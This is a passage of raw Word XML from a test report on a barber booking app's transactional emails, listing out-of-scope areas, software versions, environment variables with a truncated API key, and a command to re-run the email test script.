        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="out-of-scope"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>2.2 Out of Scope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644"/>
      </w:tblGrid>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="2873306D"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single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="22D9E964"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Area</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="1CDB69B6"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Reason</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="788E24D3" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="6615A01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Cron reminders (</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>api</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>cron</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>/reminders</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="66AC3C3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Requires live </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Vercel</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> environment + </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Supabase</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> data</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="1A3209BA" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0027AA9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Stripe webhook billing emails</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="0CC91B8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Requires live Stripe webhook events</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="67066F2A" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="0CABD3D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End-to-end booking </w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>→</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> email flow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="36EAC14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Requires live </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Supabase</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> database + auth session</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="5989430A" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="7CE38BA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client rendering (Gmail, Apple Mail, Outlook)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="4071670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Manual visual inspection required</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="55B106EF" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="01DDC0E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WhatsApp reminders (Twilio)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3960" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="333D674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Separate system, not part of email scope</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0363E960" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="2ADB83FD">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AFCC697" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6" w:rsidP="00020772">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="C9A84C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="8" w:name="_Toc228978583"/>
      <w:bookmarkStart w:id="9" w:name="test-environment"/>
      <w:bookmarkEnd w:id="5"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="C9A84C"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>3. Test Environment</w:t>
      </w:r>
      <w:bookmarkEnd w:id="8"/>
    </w:p>
    <w:p w14:paraId="3E5B69F8" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6" w:rsidP="00020772">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="40"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="software"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3.1 Software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34"/>
        <w:gridCol w:w="3187"/>
      </w:tblGrid>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="5288AA86"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4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="53FD2423"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Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="316032C6"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Version</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="70ABA440" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="6002B34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Node.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="62A50B3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v22.14.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="6FAB978A" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="03C92DB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Next.js</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="57EB0F0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16.2.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="19F9EDD5" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="24E184D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Resend SDK</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="7AB201B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^6.10.0</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="3CAD3E63" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2425B82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TypeScript</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56169DB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(via Node </w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>--experimental-strip-types</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="5D3F2BB0" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6" w:rsidP="00020772">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="40"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="11" w:name="credentials-used"/>
      <w:bookmarkEnd w:id="10"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3.2 Credentials Used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6"/>
        <w:gridCol w:w="3096"/>
      </w:tblGrid>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="21838B11"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single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="5B7BE2F7"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Variable</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="3ABF0A61"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Source</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="C9A84C"/>
          </w:tcPr>
          <w:p w14:paraId="4DFDED40"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Value</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="35D23C46" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="4E7AC458"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RESEND_API_KEY</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="56CB5483" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>env</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.example</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="5175F8AF" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>re_aqsSKwyH</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>_...</w:t>
            </w:r>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t xml:space="preserve"> (key truncated)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="05FEB044" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="5D5F1614"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RESEND_FROM_EMAIL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="23DEF680" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6">
            <w:pPr>
              <w:pStyle w:val="Compact"/>
              <w:rPr>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>env</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00CD0784">
              <w:rPr>
                <w:rStyle w:val="VerbatimChar"/>
                <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>.example</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:tcBorders>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
          </w:tcPr>
          <w:p w14:paraId="3BA3624B"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noreply@barberboost.app</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="004C5E58" w:rsidRPr="00CD0784" w14:paraId="73597A99" w14:textId="77777777" w:rsidTr="00020772">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="16BCCC17"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TEST_EMAIL</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="63EE485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Default</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2640" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
          </w:tcPr>
          <w:p w14:paraId="475A6ECD"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webxcelld@gmail.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4AC12E67" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6" w:rsidP="00020772">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="40"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="12" w:name="how-to-re-run"/>
      <w:bookmarkEnd w:id="11"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:b/>
          <w:color w:val="787777"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>3.3 How to Re-run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701DF1C4" w14:textId="77777777" w:rsidR="004C5E58" w:rsidRPr="00CD0784" w:rsidRDefault="00B45FC6">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="ExtensionTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>node</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="AttributeTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>--experimental-strip-types</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> scripts/test-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="NormalTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>emails.mjs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
          <w:rStyle w:val="CommentTok"/>
          <w:rFonts w:ascii="Oswald" w:hAnsi="Oswald" w:cs="Calibri"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t># Structure checks only (no live sends):</w:t>
      </w:r>
      <w:r w:rsidRPr="00CD0784">
        <w:rPr>
